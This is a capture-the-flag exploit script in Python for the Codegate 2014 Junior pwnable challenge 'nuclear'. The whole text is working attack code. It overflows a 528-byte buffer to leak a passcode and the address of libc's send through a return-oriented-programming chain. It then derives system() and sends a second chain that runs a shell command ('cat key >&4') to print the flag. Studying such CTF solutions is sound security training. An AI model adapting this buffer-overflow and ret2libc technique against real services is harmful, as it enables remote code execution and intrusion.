[Payload/Codegate 2014 Junior] Pwnable - 'nuclear'

Codegate 2014 Junior - Pwnable 300

-Remote Return Oriented Programming-

#!/usr/bin/python
#-*-coding:utf-8-*-
 
import socket
import struct
import time
 
#Endian Translator
p = lambda x : struct.pack("<L", x)
up = lambda x : struct.unpack("<L", x)
 
#PLT_GOT Addresses
send_plt = 0x08048900
send_got = 0x804b07c
recv_plt = 0x080488e0
recv_got = 0x0804b074
 
#Libc Addresses
recv_addr = None
system_addr = None
 
#Gadget/F_Stack Addresses
start_routine  = 0x08048b5b
ppppr = 0x0804917c
data_addr = 0x0804b088
 
#Misc
offset_send_system = 0xfb0 #Ubuntu 15.04 Vivid
passcode = None
 
print '''
[!] Codegate 2014 Nuclear Exploit [!]
~ By RevDev
~ Python 2.7
~ Local Exploit
'''
 
print "[!] Establishing Connection [!]"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('127.0.0.1', 1129))
print s
print ''
 
print "[!] Getting Passcode [!]"
 
s.recv(1024)
s.send("target\n")
s.recv(1024)
s.send("1.1/1.1\n")
s.recv(1024)
s.send("A"*512+"\n")
s.recv(1024)
passcode = s.recv(1024)
passcode = passcode[passcode.index('?', passcode.index('?')+1)+1:]
passcode = passcode.split("\n")[0]
print "Passcode : %s\n" %passcode
 
print "[!] Leaking Libc Function Address [!]"
s.send("launch\n")
s.recv(1024)
time.sleep(0.3)
s.send(passcode+"\n")
time.sleep(0.3)
s.recv(1024)
payload = "A"*528 + p(send_plt) + p(ppppr) + p(4) + p(send_got) + p(4) + p(0) + p(start_routine) + "\x90"*4 + p(4)
s.send(payload + "\n")
send_addr = up(s.recv(1024))
system_addr = int(send_addr[0]) + offset_send_system
print "_Send Address : 0x%x" %send_addr
print "_System Address : 0x%x\n" %system_addr
 
print "[!] Sending Exploit [!]"
payload = "A"*528 + p(recv_plt) + p(ppppr) + p(4) + p(data_addr) + p(13) + p(0) + p(system_addr) + "\x90"*4 + p (data_addr)
s.send(payload + "\n")
s.recv(1024)
s.send("cat key >&4\n"+"\x00")
s.recv(1024)
print "Flag : %s" %s.recv(1024)
s.close()